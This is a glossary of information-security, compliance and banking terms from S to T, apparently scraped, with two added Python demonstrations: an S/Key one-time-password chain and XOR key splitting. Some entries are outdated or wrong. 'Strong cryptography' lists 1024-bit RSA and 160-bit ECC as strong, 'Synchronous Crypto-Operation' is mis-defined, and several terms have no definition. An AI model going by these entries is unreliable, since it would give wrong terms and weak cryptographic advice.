S/KeynounA security mechanism (RFC 1760) that uses a cryptographic hash function to generate a sequence of 64-bit, one-time passwords for remote user login. The client generates a one-time password by applying the MD4 cryptographic hash function multiple times to the user's secret key. For each successive authentication of the user, the number of hash applications is reduced by one, so the server needs to store only the most recently accepted value, never the secret itself.CredentialRegulatedMay 9, 2026
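The hash chain described above is easier to see in code. This is an added example, not the reference S/Key implementation: it substitutes SHA-256 folded to 64 bits for the MD4 fold that RFC 1760 specifies (MD4 is missing from many current hashlib builds), and the seed, secret and chain length are constructed values. The chain mechanics, including why a captured password cannot be replayed, are the ones the entry describes.

```python
import hashlib

# Added example, not part of the glossary: an S/Key-style one-time-password
# chain. Assumption: SHA-256 folded to 8 bytes stands in for RFC 1760's
# 64-bit MD4 fold; the counting-down chain is otherwise the same.


def _hash64(data: bytes) -> bytes:
    """One chain step: hash, then XOR the 32-byte digest down to 8 bytes."""
    digest = hashlib.sha256(data).digest()
    out = bytearray(8)
    for i in range(0, len(digest), 8):
        for j in range(8):
            out[j] ^= digest[i + j]
    return bytes(out)


def skey_chain(seed: str, secret: str, n: int) -> bytes:
    """OTP_n = H^n(seed || secret): n applications of the folded hash."""
    value = (seed + secret).encode()
    for _ in range(n):
        value = _hash64(value)
    return value


class SKeyVerifier:
    """Server side: keeps the seed, the sequence number and OTP_seq only."""

    def __init__(self, seed: str, secret: str, n: int):
        self.seed = seed
        self.seq = n
        self.stored = skey_chain(seed, secret, n)
        # The secret is used once, at enrolment, and is not retained.

    def authenticate(self, otp: bytes) -> bool:
        """Accept otp if H(otp) equals the stored value, then step down one."""
        if self.seq <= 1:
            # OTP_0 would be the raw seed||secret; the chain must be re-seeded.
            return False
        if _hash64(otp) != self.stored:
            return False
        self.stored = otp      # the accepted OTP becomes the next check value
        self.seq -= 1
        return True


def client_response(seed: str, secret: str, challenge_seq: int) -> bytes:
    """Client answers the server's (seq, seed) challenge with OTP_{seq-1}."""
    return skey_chain(seed, secret, challenge_seq - 1)


if __name__ == "__main__":
    server = SKeyVerifier("ex01", "correct horse", 5)   # constructed values
    otp = client_response("ex01", "correct horse", server.seq)
    print("first use:", server.authenticate(otp))         # accepted
    print("replay:   ", server.authenticate(otp))         # rejected
```

Because each accepted value is one hash step below the previous one, an eavesdropper who captures OTP_k would need to invert H to produce OTP_{k-1}; that is what makes the scheme resistant to replay but not to an active attacker who intercepts the login and uses the fresh OTP first, which is why S/Key is paired with an encrypted transport in practice.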
Safeguarding StatementnounStatement affixed to a computer output or printout that states the highest classification being processed at the time the product was produced and requires control of the product, at that level, until determination of the true classification by an authorized individual. Synonymous with banner.ArtifactRegulatedCUIMay 9, 2026
SanitizationnounA general term referring to the actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.ProcessRegulatedMay 12, 2026
SAS 70 reportnounAn audit report of a servicing institution prepared in accordance with guidance provided in the American Institute of Certified Public Accountants' Statement of Auditing Standards Number 70. Replaced by SSAE 16, which was itself superseded by SSAE 18 in 2017; the equivalent report today is a SOC 1.ArtifactRegulatedMay 12, 2026
Satellite technologynounCommunication links carried over satellites. These links efficiently extend the reach of typical communication systems to distant areas and provide alternative traffic routing in an emergency.SystemRegulatedMay 12, 2026
ScavengingnounSearching through object residue to acquire data.ThreatRegulatedCUIMay 12, 2026
Scoping GuidancenounA part of tailoring guidance providing organizations with specific policy/regulatory-related, technology-related, system component allocation-related, operational/environmental-related, physical infrastructure-related, public access-related, scalability-related, common control-related, and security objective-related considerations on the applicability and implementation of individual security controls in the security control baseline.RequirementRegulatedCUIMay 12, 2026
Screen OutnounRegulatedMay 13, 2026
Secure CommunicationsnounTelecommunications deriving security through use of NSA-approved products and/or Protected Distribution Systems.CapabilityRegulatedCUIMay 12, 2026
secure development practicenounA software development practice where the confidentiality, integrity, and availability of the software code is protected against threats and vulnerabilities.ProcessRegulatedIPMay 9, 2026
secure disposalnounThe process of erasing or overwriting data stored on media before relinquishing control of said media when no longer required, in a manner that ensures that no data can be recovered from the media.ProcessRegulatedMay 9, 2026
Secure Electronic TransactionnounA standard intended to ensure that credit card and associated payment order information travels safely and securely between the various involved parties on the Internet. Developed by Visa and MasterCard in the late 1990s, SET was never widely deployed and has been superseded by TLS-protected payment pages and card-network authentication schemes.FrameworkRegulatedPCIMay 9, 2026
Secure ErasenounAn overwrite technology that uses a firmware-based process to overwrite a hard drive. It is a drive command defined in the ANSI ATA and SCSI disk drive interface specifications and runs inside the drive hardware, so it reaches sectors the host cannot address (remapped blocks, for example). It completes in about 1/8 the time of a DoD 5220.22-M multi-pass block overwrite.ControlRegulatedMay 9, 2026
Secure Socket LayernounA protocol used for protecting private information during transmission via the Internet. Note: SSL uses public-key cryptography during its handshake to authenticate the server and establish a shared session key; the data transferred over the connection is then encrypted with a symmetric cipher under that key. Most Web browsers support it, and many Web sites use the protocol to obtain confidential user information, such as credit card numbers. By convention, URLs that require an SSL connection start with “https:” instead of “http:.” All SSL versions are now deprecated (SSL 3.0 by RFC 7568) in favour of TLS, and PCI DSS has not permitted SSL or early TLS for protecting cardholder data since mid-2018.NetworkRegulatedPCIMay 12, 2026
Secure Sockets LayernounA protocol that is used to transmit private documents through the Internet. Scope Note: the SSL handshake uses the server's public/private key pair to authenticate the server and agree a session key; the data transferred through the SSL connection is encrypted with a symmetric cipher under that session key. SSL has been superseded by TLS and should not be enabled on current systems.NetworkRegulatedMay 12, 2026
Secure SubsystemnounSubsystem containing its own implementation of the reference monitor concept for those resources it controls. Secure subsystem must depend on other controls and the base operating system for the control of subjects and the more primitive system objects.SystemRegulatedMay 12, 2026
Secure/Multipurpose Internet Mail ExtensionsnounA set of specifications for securing electronic mail. S/MIME is based upon the widely used MIME standard [MIME] and describes a protocol for adding cryptographic security services through MIME encapsulation of digitally signed and encrypted objects. The basic security services offered by S/MIME are authentication, non-repudiation of origin, message integrity, and message privacy. Optional security services include signed receipts, security labels, secure mailing lists, and an extended method of identifying the signer’s certificate(s).ControlRegulatedMay 12, 2026
Security AttributenounAn abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system which are used to enable the implementation of access control and flow control policies; reflect special dissemination, handling, or distribution instructions; or support other aspects of the information security policy.DataRegulatedCUIMay 9, 2026
Security auditnounAn independent review and examination of system records and activities to test for adequacy of system controls, ensure compliance with established policy and operational procedures, and recommend any indicated changes in control, policy, and procedures.ProcessRegulatedMay 9, 2026
Security Awareness programnounThe documented plan and documented activities to create well-informed interest in being free from danger or threat.ProcessRegulatedCUIMay 9, 2026
Security BannernounA banner at the top or bottom of a computer screen that states the overall classification of the system in large, bold type. Also can refer to the opening screen that informs users of the security implications of accessing a computer resource.ControlRegulatedCUIMay 12, 2026
Security breachnounA security event that results in unauthorized access of data, applications, services, networks, or devices by bypassing underlying security mechanisms.EventRegulatedMay 9, 2026
Security CategorizationnounThe process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.ProcessRegulatedCUIMay 12, 2026
Security CategorynounThe characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, individuals, other organizations, and the Nation.RequirementRegulatedMay 12, 2026
security controlnounA safeguard or countermeasure to avoid, counteract or minimize security risks relating to personal property, or any company property. For business-to-business facing organizations whose service may affect the financial statements of the other company, the prospect may require successful audit reports of policy controls.ControlRegulatedMay 9, 2026
Security Control AssessmentnounThe testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.ControlRegulatedCUIMay 9, 2026
Security Control BaselinenounOne of the sets of minimum security controls defined for federal information systems in NIST Special Publication 800-53 and CNSS Instruction 1253.ControlRegulatedMay 9, 2026
Security Controls BaselinenounThe set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.RequirementRegulatedCUIMay 9, 2026
security eventnounAn event that potentially compromises the confidentiality, integrity, availability, or accountability of an information system.EventRegulatedMay 12, 2026
Security Event LognounA record of security-related and auditing-related events.EventRegulatedCUIMay 12, 2026
security incidentnounAn adverse event where a threat or exploit may compromise a computer system and cause: loss of data confidentiality, disruption of system or data integrity, or disruption or denial of availability of the system and/or data.EventRegulatedMay 12, 2026
security incident response plannounThe steps taken during an incident. An incident response plan brings together and organizes the resources for dealing with any event that harms or threatens the security of information assets. Such an event may be a malicious code attack, an unauthorized access to information or systems, the unauthorized use of services, a denial of service attack, or a hoax.ProcessRegulatedMay 9, 2026
Security KernelnounHardware, firmware, and software elements of a trusted computing base implementing the reference monitor concept. Security kernel must mediate all accesses, be protected from modification, and be verifiable as correct.SystemRegulatedMay 12, 2026
Security LabelnounInformation that represents or designates the value of one or more security relevant-attributes (e.g., classification) of a system resource.ControlRegulatedMay 12, 2026
Security lognounA record that contains log-in and logout activity and other security-related events and that is used to track security-related information on a computer system.ArtifactRegulatedMay 12, 2026
Security MarkingnounHuman-readable information affixed to information system components, removable media, or output indicating the distribution limitations, handling caveats, and applicable security markings.ArtifactRegulatedCUIMay 9, 2026
Security Net Control StationnounManagement system overseeing and controlling implementation of network security policy.SystemRegulatedCUIMay 9, 2026
security patchnounComputer code intended to repair or lessen the impact of vulnerabilities within application software.ControlRegulatedMay 12, 2026
security patchingnounThe task of distributing and applying security patches to organizational operating systems and applications.ProcessRegulatedMay 9, 2026
security patching processnounThe series of steps taken to acquire, test, and distribute security patches to the appropriate administrators and users throughout the organization.ProcessRegulatedMay 9, 2026
security practicenounThe actions an organization takes to initiate, implement, and maintain organizational security.ProcessRegulatedMay 9, 2026
Security RangenounHighest and lowest security levels that are permitted in or on an information system, system component, subsystem, or network.RequirementRegulatedCUIMay 12, 2026
security requirementnounA necessary condition that must be met to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.RequirementRegulatedMay 9, 2026
Security Requirements BaselinenounDescription of the minimum requirements necessary for an information system to maintain an acceptable level of risk.RequirementRegulatedMay 9, 2026
Security RequirementsnounRequirements levied on an information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.RequirementRegulatedMay 12, 2026
Security Requirements Traceability MatrixnounMatrix that captures all security requirements linked to potential risks and addresses all applicable C&A requirements. It is, therefore, a correlation statement of a system’s security features and compliance methods for each security requirement.ArtifactRegulatedCUIMay 9, 2026
Security TagnounInformation unit containing a representation of certain security-related information (e.g., a restrictive attribute bit map).DataRegulatedCUIMay 12, 2026
Security TargetnounCommon Criteria specification that represents a set of security requirements to be used as the basis of an evaluation of an identified Target of Evaluation (TOE).RequirementRegulatedMay 12, 2026
Security Test & EvaluationnounExamination and analysis of the safeguards required to protect an information system, as they have been applied in an operational environment, to determine the security posture of that system.ProcessRegulatedCUIMay 12, 2026
Security violationnounAn instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information or system resources.EventRegulatedMay 9, 2026
Senior Agency Information Security OfficernounOfficial responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Management Act (FISMA) and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. SP 800-53 Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.RoleRegulatedMay 9, 2026
Sensitive Compartmented InformationnounClassified information concerning or derived from intelligence sources, methods, or analytical processes, which is required to be handled within formal access control systems established by the Director of National Intelligence.DataRegulatedCUIMay 9, 2026
Sensitive Compartmented Information FacilitynounAccredited area, room, or group of rooms, buildings, or installation where SCI may be stored, used, discussed, and/or processed.PhysicalRegulatedCUIMay 9, 2026
Sensitive customer informationnounA customer’s name, address, or telephone number, in conjunction with the customer’s social security number, driver’s license number, account number, credit or debit card number, or personal identification number or password that would permit access to the customer’s account. Sensitive customer information also includes any combination of components of customer information that would allow someone to log into or access the customer’s account, such as user name and password or password and account number.DataRegulatedPIIMay 9, 2026
sensitive datanounInformation whose loss, misuse, unauthorized access to, modification, or destruction, could adversely affect the national interest or the conduct of federal programs, or privacy to which individuals are entitled, but which has not been specifically authorized to be kept secret in the interest of national defense or foreign policy, etc.DataRegulatedCUIMay 9, 2026
Sensitive InformationnounInformation, the loss, misuse, or unauthorized access to or modification of, that could adversely affect the national interest or the conduct of federal programs, or the privacy to which individuals are entitled under 5 U.S.C. Section 552a (the Privacy Act), but that has not been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy. (Systems that are not national security systems, but contain sensitive information, are to be protected in accordance with the requirements of the Computer Security Act of 1987 [P.L.100-235].)DataRegulatedCUIMay 9, 2026
Sensitivity LabelnounInformation representing elements of the security label(s) of a subject and an object. Sensitivity labels are used by the trusted computing base (TCB) as the basis for mandatory access control decisions. See Security Label.DataRegulatedCUIMay 12, 2026
service providernounFor purposes of the Information Security Standards, service provider means any person or entity that maintains, processes, or otherwise is permitted access to customer information or consumer information through its provision of services directly to a financial institution.OrganizationRegulatedPIIMay 12, 2026
SettlementnounThe final step in the transfer of ownership involving the physical exchange of securities or payment. In a banking transaction, settlement is the process of recording the debit and credit positions of the parties involved in a transfer of funds. In a financial instrument transaction, settlement includes both the transfer of securities by the seller and the payment by the buyer. Settlements can be "gross" or "net." Gross settlement means each transaction is settled individually. Net settlement means parties exchanging payments will offset mutual obligations to deliver identical items (e.g., dollars or euros), at a specified time, after which only one net amount of each item is exchanged.ProcessRegulatedMay 9, 2026
Settlement date (ACH)nounThe date on which an exchange of funds with respect to an entry is reflected on the books of the Federal Reserve Bank.DataRegulatedMay 12, 2026
Settlement eligible instructionsnounSee "Matched Instructions".RequirementRegulatedMay 9, 2026
shared accountnounA single local account created for a group, with one user name and one password.IdentityRegulatedCUIMay 9, 2026
Shielded EnclosurenounRoom or container designed to attenuate electromagnetic radiation, acoustic signals, or emanations.PhysicalRegulatedCUIMay 12, 2026
Short positionnounIn respect of a currency balance that is less than zero, the amount by which such currency balance is less than zero. An investment position that benefits from a decline in market price. When one sells a currency their position is short.MetricRegulatedMay 12, 2026
Short position limitnounIn respect of an eligible currency, the maximum short position a Settlement Member may have at any time in that eligible currency and, unless otherwise reduced pursuant to the CLS Bank Rules, shall equal (i) the total amount of all available committed liquidity facilities in such eligible currency (or such lesser amount that CLS Bank may determine from time to time) minus (ii) the amount of the largest available committed liquidity facility among such liquidity facilities (after taking into account any amounts already drawn).RequirementRegulatedMay 9, 2026
Short TitlenounIdentifying combination of letters and numbers assigned to certain COMSEC materials to facilitate handling, accounting, and controlling.ArtifactRegulatedCUIMay 9, 2026
Signals AnalysisnounGaining indirect knowledge of communicated data by monitoring and analyzing a signal that is emitted by a system and that contains the data but is not intended to communicate the data.CapabilityRegulatedMay 12, 2026
Signature GenerationnounThe process of using a digital signature algorithm and a private key to generate a digital signature on data.ProcessRegulatedMay 9, 2026
Signature ValidationnounThe (mathematical) verification of the digital signature and obtaining the appropriate assurances (e.g., public key validity, private key possession, etc.).ControlRegulatedMay 12, 2026
Significant firmsnounFirms that process a significant share of transactions in critical financial markets.OrganizationRegulatedMay 9, 2026
Single Point KeyingnounMeans of distributing key to multiple, local crypto equipment or devices from a single fill point.ProcessRegulatedCUIMay 9, 2026
Single-Entry (ACH)nounA one-time transfer of funds initiated by an originator in accordance with the receiver's authorization for a single ACH credit or debit to the receiver's consumer account.DataRegulatedPCIMay 9, 2026
SkimmingnounThe unauthorized use of a reader to read tags without the authorization or knowledge of the tag’s owner or the individual in possession of the tag.ThreatRegulatedPIIMay 9, 2026
Smart cardnounA credit card-sized card with embedded integrated circuits that can store, process, and communicate information.PhysicalRegulatedMay 12, 2026
software assurancenounLevel of confidence that software is free from vulnerabilities, either intentionally designed into the software or accidentally inserted at any time during its life cycle, and that the software functions in the intended manner.CapabilityRegulatedMay 12, 2026
Software System Test and Evaluation ProcessnounProcess that plans, develops, and documents the qualitative/quantitative demonstration of the fulfillment of all baseline functional performance, operational, and interface requirements.ProcessRegulatedMay 12, 2026
Sound practicesnounDefined in the "Interagency Paper on Sound Practices to Strengthen the Resilience of the U.S. Financial System," which was issued by the Board of Governors of the Federal Reserve System, Office of the Comptroller of the Currency, and Securities and Exchange Commission.RequirementRegulatedMay 9, 2026
Special Access ProgramnounA program established for a specific class of classified information that imposes safeguarding and access requirements that exceed those normally required for information at the same classification level.ProcessRegulatedCUIMay 9, 2026
Special Access Program FacilitynounFacility formally accredited by an appropriate agency in accordance with DCID 6/9 in which SAP information may be processed.PhysicalRegulatedCDIMay 9, 2026
SpillagenounSecurity incident that results in the transfer of classified or CUI information onto an information system not accredited (i.e., authorized) for the appropriate security level.EventRegulatedCUIMay 9, 2026
Split Knowledgenoun1. Separation of data or information into two or more parts, each part constantly kept under control of separate authorized individuals or teams so that no one individual or team will know the whole data. 2. A process by which a cryptographic key is split into multiple key components, individually sharing no knowledge of the original key, which can be subsequently input into, or output from, a cryptographic module by separate entities and combined to recreate the original cryptographic key.ControlRegulatedCUIMay 9, 2026
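Sense 2 of the definition above, a key split into components that individually carry no information about the key, is usually implemented with XOR: every component but the last is uniformly random, and the last is the key XORed with all of them. What follows is an added example, not code from the glossary or from any HSM vendor; the key bytes are constructed test input. It also includes a deliberately naive split (slicing the key) to show what "individually sharing no knowledge" rules out.

```python
import secrets

# Added example, not part of the glossary: XOR split knowledge for a
# cryptographic key. Any proper subset of the components is uniformly
# random, so no custodian (or coalition short of all of them) learns
# anything about the key.


def _xor_all(chunks):
    out = bytearray(len(chunks[0]))
    for chunk in chunks:
        if len(chunk) != len(out):
            raise ValueError("all components must be key length")
        for i, b in enumerate(chunk):
            out[i] ^= b
    return bytes(out)


def split_key(key: bytes, custodians: int) -> list:
    """Return `custodians` components whose XOR is `key`."""
    if custodians < 2:
        raise ValueError("split knowledge needs at least two custodians")
    components = [secrets.token_bytes(len(key)) for _ in range(custodians - 1)]
    components.append(_xor_all([key] + components))   # last = key ^ all others
    return components


def combine_key(components) -> bytes:
    """Recreate the key; order of components does not matter."""
    return _xor_all(list(components))


def naive_split(key: bytes, custodians: int) -> list:
    """Contrast only: slicing hands each custodian real key bytes."""
    step = -(-len(key) // custodians)   # ceiling division
    return [key[i:i + step] for i in range(0, len(key), step)]


if __name__ == "__main__":
    key = secrets.token_bytes(32)       # constructed sample key
    parts = split_key(key, 3)
    print("all three recombine:", combine_key(parts) == key)
    print("two of three recombine:", combine_key(parts[:2]) == key)
    print("naive part 0 is key prefix:", naive_split(key, 2)[0] == key[:16])
```

The security of the scheme depends on the random components coming from a cryptographic generator (hence `secrets`, not `random`) and on the components being entered into the module separately by separate people, which is the operational half of the definition that code alone cannot enforce.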
SpotnounThe most common foreign exchange transaction. Spot or spot date refers to the spot transaction value date that requires settlement within two business days, subject to value date calculation.ProcessRegulatedMay 12, 2026
Screen scrapingnounA process used by information aggregators to gather information from a customer's website, whereby the aggregator accesses the target site by logging in as the customer, electronically reads and copies selected information from the displayed webpage(s), then redisplays the information on the aggregator's site. The process is analogous to "scraping" the information off the computer screen.ProcessRegulatedPIIMay 9, 2026
Standard Entry Class (SEC) codenounThree-character code in an ACH company/batch header record used to identify the payment type within an ACH batch.DataRegulatedMay 12, 2026
Start-Up KEKnounKey-encryption-key held in common by a group of potential communicating entities and used to establish ad hoc tactical networks.CredentialRegulatedCUIMay 9, 2026
StatenounIn the AES specification (FIPS 197), the intermediate Cipher result that can be pictured as a rectangular array of bytes.DataRegulatedMay 12, 2026
Static KeynounA key that is intended for use for a relatively long period of time and is typically intended for use in many instances of a cryptographic key establishment scheme.CredentialRegulatedMay 9, 2026
Statutory requirementsnounLaws created by government institutions.RequirementRegulatedMay 9, 2026
SteganographynounThe art and science of communicating in a way that hides the existence of the communication. For example, a child pornography image can be hidden inside another graphic image file, audio file, or other file format.ThreatRegulatedPHIMay 12, 2026
stipulationnoun(law) an agreement or concession made by parties in a judicial proceeding (or by their attorneys) relating to the business before the court; must be in writing unless they are part of the court record.ArtifactRegulatedMay 9, 2026
storagenounThe action or method of keeping something for future use.SystemRegulatedCUIMay 9, 2026
storage locationnounA place where things are held for a period of time.PhysicalRegulatedMay 12, 2026
Store cardnounA credit card issued by a financial institution for a specific merchant or vendor that does not carry a bankcard association logo. Store cards can only be used at the merchant or vendor whose name appears on the front of the card.PhysicalRegulatedPCIMay 9, 2026
Stored-value cardnounA card-based payment system that assigns a value to the card. The card's value can be stored on the card itself (i.e., on the magnetic stripe or in a computer chip) or in a network database. As the card is used for transactions, the transaction amounts are subtracted from the card's balance. As the balance approaches zero, some cards can be "reloaded" through various methods and others are designed to be discarded. These cards are often used in closed systems for specific types of purchases.PhysicalRegulatedPCIMay 9, 2026
Straight-Through Processing (STP)nounProcessRegulatedMay 13, 2026
Striped CorenounA network architecture in which user data traversing a core IP network is decrypted, filtered and re-encrypted one or more times. Note: The decryption, filtering, and re-encryption are performed within a “Red gateway”; consequently, the core is “striped” because the data path is alternately Black, Red, and Black.NetworkRegulatedCUIMay 9, 2026
Strong AuthenticationnounThe requirement to use multiple factors for authentication and advanced technology, such as dynamic passwords or digital certificates, to verify an entity’s identity.ControlRegulatedMay 9, 2026
strong cryptographynounCryptographic techniques that make it almost impossible to decrypt without having the key. The strength relies on the cryptographic key used. Effective size of the key should meet the minimum key size of comparable strengths recommendations based on industry-tested and accepted algorithms and strong key lengths. Examples of industry-tested and accepted standards and algorithms for encryption include AES (128 bits and higher), TDES (minimum double-length keys), RSA (1024 bits and higher), ECC (160 bits and higher), and ElGamal (1024 bits and higher). See NIST Special Publication 800-57 (http://csrc.nist.gov/publications/) for more information.ControlRegulatedMay 12, 2026
Strong Star PropertynounIn Strong Star Property, a user cannot write data to higher or lower classifications levels than their own.RequirementRegulatedMay 12, 2026
Subject Security LevelnounSensitivity label(s) of the objects to which the subject has both read and write access. Security level of a subject must always be dominated by the clearance level of the user associated with the subject.IdentityRegulatedCUIMay 9, 2026
Subordinate Certification AuthoritynounIn a hierarchical PKI, a Certification Authority whose certificate signature key is certified by another CA, and whose activities are constrained by that other CA.SystemRegulatedCUIMay 9, 2026
SubscribernounA party who receives a credential or token from a CSP (Credentials Service Provider) and becomes a claimant in an authentication protocol.IdentityRegulatedMay 12, 2026
Substitute check (Check 21)nounAlso known as the Image Replacement Document (IRD). A paper reproduction of an original check that (1) contains an image of the front and back of the original check; (2) bears a MICR line that, except as provided under ANS X9.100-140, contains all the information appearing on the MICR line of the original check when it was issued and any additional information that was encoded on the original check's MICR line before an image of the original check was captured; (3) conforms in paper stock, dimension, and otherwise with ANS X9.100-140; and (4) is suitable for automated processing in the same manner as the original check. The Federal Reserve Board of Governors can by rule or order determine different standards.ArtifactRegulatedPCIMay 9, 2026
Suite AnounA specific set of classified cryptographic algorithms used for the protection of some categories of restricted mission-critical information.RequirementRegulatedCUIMay 9, 2026
Suite BnounA specific set of cryptographic algorithms suitable for protecting national security systems and information throughout the U.S. government and to support interoperability with allies and coalition partners.RequirementRegulatedCUIMay 9, 2026
SuperencryptionnounProcess of encrypting encrypted information. Occurs when a message, encrypted off-line, is transmitted over a secured, online circuit, or when information encrypted by the originator is multiplexed onto a communications trunk, which is then bulk encrypted.ProcessRegulatedCUIMay 9, 2026
SupersessionnounScheduled or unscheduled replacement of COMSEC material with a different edition.ProcessRegulatedCUIMay 9, 2026
supervisory agencynounThis role focuses on the examination or auditing of financial records of financial institutions. Any state authority that is required by law to examine or audit financial records should be assigned to this role.OrganizationRegulatedMay 9, 2026
Supervisory control and data acquisitionnounA generic name for a computerized system that is capable of gathering and processing data and applying operational controls over long distances. Typical uses include power transmission and distribution and pipeline systems. SCADA was designed for the unique communication challenges (delays, data integrity, etc.) posed by the various media that must be used, such as phone lines, microwave, and satellite. Usually shared rather than dedicated.SystemRegulatedCUIMay 12, 2026
Supply Chain AttacknounAttacks that allow the adversary to utilize implants or other vulnerabilities inserted prior to installation in order to infiltrate data, or manipulate information technology hardware, software, operating systems, peripherals (information technology products) or services at any point during the life cycle.ThreatRegulatedCUIMay 9, 2026
supply chain risknounA risk measured by the likelihood and severity of damage if an Information Technology or Operations Technology system is compromised by a supply chain attack, and takes into account the importance of the system and the impact of compromise on organizational operations and assets, individuals, other organizations, and the Nation. Supply chain attacks may involve manipulating computing system hardware, software, or services at any point during the life cycle. Supply chain attacks are typically conducted or facilitated by individuals or organizations that have access through commercial ties, leading to stolen critical data and technology, corruption of the system/ infrastructure, and/or disabling of mission-critical operations.ThreatRegulatedMay 12, 2026
Supply Chain Risk ManagementnounThe process of identifying, analyzing, and assessing supply chain risk and accepting, avoiding, transferring or controlling it to an acceptable level considering associated costs and benefits of any actions taken.ProcessRegulatedMay 12, 2026
supply chain risk management processnounThe implementation through controls and structures of strategies to manage both everyday and exceptional risks along the supply chain based on continuous risk assessment with the objective of reducing vulnerability and ensuring continuity.ProcessRegulatedMay 12, 2026
Suppression MeasurenounAction, procedure, modification, or device that reduces the level of, or inhibits the generation of, compromising emanations in an information system.ControlRegulatedCUIMay 12, 2026
Suspicious activity report (SAR)nounReports required to be filed by the Bank Secrecy Act when a financial institution identifies or suspects fraudulent activity.ArtifactRegulatedMay 12, 2026
Synchronous Crypto-OperationnounEncryption algorithms using the same secret key for encryption and decryption.CapabilityRegulatedMay 12, 2026
Synchronous data replicationnounA process for copying data from one source to another in which an acknowledgement of the receipt of data at the copy location is required for application processing to continue. Consequently, the content of databases stored in alternate facilities is identical to those at the original storage site, and copies of data contain current information at the time of a disruption in processing.ProcessRegulatedMay 12, 2026
System hardeningnounConfiguring all configurable items within an entire system to reduce the host’s security weaknesses.ProcessRegulatedMay 12, 2026
System HighnounHighest security level supported by an information system.RequirementRegulatedMay 9, 2026
System High ModenounInformation systems security mode of operation wherein each user, with direct or indirect access to the information system, its peripherals, remote terminals, or remote hosts, has all of the following: a. valid security clearance for all information within an information system; b. formal access approval and signed nondisclosure agreements for all the information stored and/or processed (including all compartments, subcompartments and/or special access programs); and c. valid need-to-know for some of the information contained within the information system.ProcessRegulatedCUIMay 9, 2026
System IndicatornounSymbol or group of symbols in an off-line encrypted message identifying the specific cryptosystem or key used in the encryption.DataRegulatedCUIMay 9, 2026
System InterconnectionnounThe direct connection of two or more IT systems for the purpose of sharing data and other information resources.NetworkRegulatedMay 12, 2026
System Of RecordsnounA group of any records under the control of any agency from which information is retrieved by the name of the individual or by some identifying number, symbol, or other identifying particular assigned to the individual.DataRegulatedPIIMay 9, 2026
System ProfilenounDetailed security description of the physical structure, equipment component, location, relationships, and general operating environment of an information system.ArtifactRegulatedCUIMay 9, 2026
system securitynounCapabilityRegulatedCUIMay 8, 2026
System Security PlannounArtifactRegulatedCUIMay 8, 2026
System SoftwarenounSystemRegulatedMay 8, 2026
Tactical EdgenounOrganizationRegulatedCDIMay 8, 2026
Technical Security ControlsnounControlRegulatedMay 12, 2026
technology service providernounOrganizationRegulatedMay 12, 2026
TempestnounCapabilityRegulatedCUIMay 8, 2026
TEMPEST TestnounProcessRegulatedCUIMay 8, 2026
TEMPEST ZonenounDesignated area within a facility where equipment with appropriate TEMPEST characteristics (TEMPEST zone assignment) may be operated.PhysicalRegulatedCUIMay 9, 2026
termination actionnounAny action which terminates or brings something to an end.ProcessRegulatedCUIMay 12, 2026
Test KeynounKey intended for testing of COMSEC equipment or systems.CredentialRegulatedCUIMay 9, 2026
test resultnounA formal document defining the subject of the test, the test plan, approach, analysis tools, and conclusions found during the testing process.ArtifactRegulatedMay 12, 2026
third partynounA person or group besides the two primarily involved in a situation, agreement, business, etc.IdentityRegulatedMay 13, 2026
third party and supply chain managementnounSupply chain management is the oversight of materials, information, and finances as they move in a process from supplier to manufacturer to wholesaler to retailer to consumer. Supply chain management involves coordinating and integrating these flows both within and among companies, i.e., Third Parties. Third party management is the process whereby companies monitor and manage interactions with all external parties with which it has a relationship.ProcessRegulatedMay 9, 2026
third party dependencynounA third party that may have no interest in an organization's project or operations, but can can have an impact on them.RequirementRegulatedMay 12, 2026
third party managementnounAn arrangement where a company will assume the day-to-day management of a property or package of properties it does not own for another company or institution in return for a fee.ProcessRegulatedMay 9, 2026
third party management policynounThe guidelines and rules on how an organization should to direct and supervise business activities and relations with a third party.RequirementRegulatedMay 12, 2026
Third Party Service ProvidernounAs defined in the PCI DSS and PA-DSS Glossary of Terms, Abbreviations, and Acronyms, a service provider is a business entity that is not a payment brand, directly involved in the processing, storage, or transmission of cardholder data on behalf of another entity. This also includes companies that provide services that control or could impact the security of cardholder data. There are many types of businesses that could fall into the category of “service provider,” dependent on the services provided. Most commonly, a TPSP could be a legally separate entity; but it can also be a separate business unit or component of the entity under assessment—for example, an internal service provider—where the provider is outside the direct management control of the entity assessed.OrganizationRegulatedPCIMay 9, 2026
Third-party relationshipnounAny business arrangement between a financial institution and another entity, by contract or otherwise.ProcessRegulatedMay 12, 2026
Third-party sendernounA special subset of a technology service provider that is authorized to transmit ACH files on behalf of an originator. Typically, the ODFI must rely upon warranties by the third- party sender regarding the originators' identity and credit worthiness, which places additional risks on the ODFI.IdentityRegulatedMay 12, 2026
Third-party service provider (ACH)nounA third party, other than the ODFI or RDFI, that performs any function on behalf of the ODFI or the RDFI related to ACH processing. These functions would include the creation and sending of ACH files or acting as a sending or receiving point on behalf of a participating depository financial institution.OrganizationRegulatedPCIMay 12, 2026
time framenounA specified period of time for something to be done or take place.RequirementRegulatedMay 9, 2026
Time-Compliance DatenounDate by which a mandatory modification to a COMSEC end-item must be incorporated if the item is to remain approved for operational use.RequirementRegulatedCUIMay 9, 2026
timelinessnounPublic and private parties, nationally and internationally, should act in a timely coordinately manner to prevent and respond to breaches of security of information systems.RequirementRegulatedMay 12, 2026
